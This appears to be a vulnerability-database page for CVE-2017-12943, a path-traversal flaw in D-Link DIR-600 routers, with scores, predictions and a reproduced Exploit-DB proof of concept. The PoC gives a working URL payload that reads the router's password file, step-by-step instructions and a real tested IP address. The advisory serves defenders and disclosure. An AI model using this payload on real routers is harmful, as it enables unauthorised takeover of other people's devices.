VIR Vulnerability Intelligence Relay

CVE-2017-12943

critical
Published 2017-08-18 ยท Modified 2026-05-13
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.

Predictions

Exploit likelihood
97%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42581 webapps hardware text ยท 1 KB
Jithin D Kurup ยท 2017-08-29

D-Link DIR-600 - Authentication Bypass

text exploit Source: Exploit-DB 
# Exploit Title: D-Link DIR-600  - Authentication Bypass (Absolute Path Traversal Attack)
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor : www.dlink.com
# Version: Hardware version: B1
Firmware version: 2.01
# Tested on:All Platforms
 
 
1) Description
 
After Successfully Connected to D-Link DIR-600 
Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's
Admin Panel Just by adding a simple payload into URL.

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, 
as demonstrated by discovering the admin password.
 
Its More Dangerous when your Router has a public IP with remote login
enabled.
 
 
IN MY CASE,
Tested Router IP : http://190.164.170.249
 
 
 
Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ
 
2) Proof of Concept
 
Step 1: Go to
Router Login Page : http://190.164.170.249:8080
 
Step 2:
Add the payload to URL.

Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd
 

 
Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.
 
 
 
 
---------------Greetz----------------
+++++++++++ www.0seccon.com ++++++++++++
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith

References

CWEs

CWE-22

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.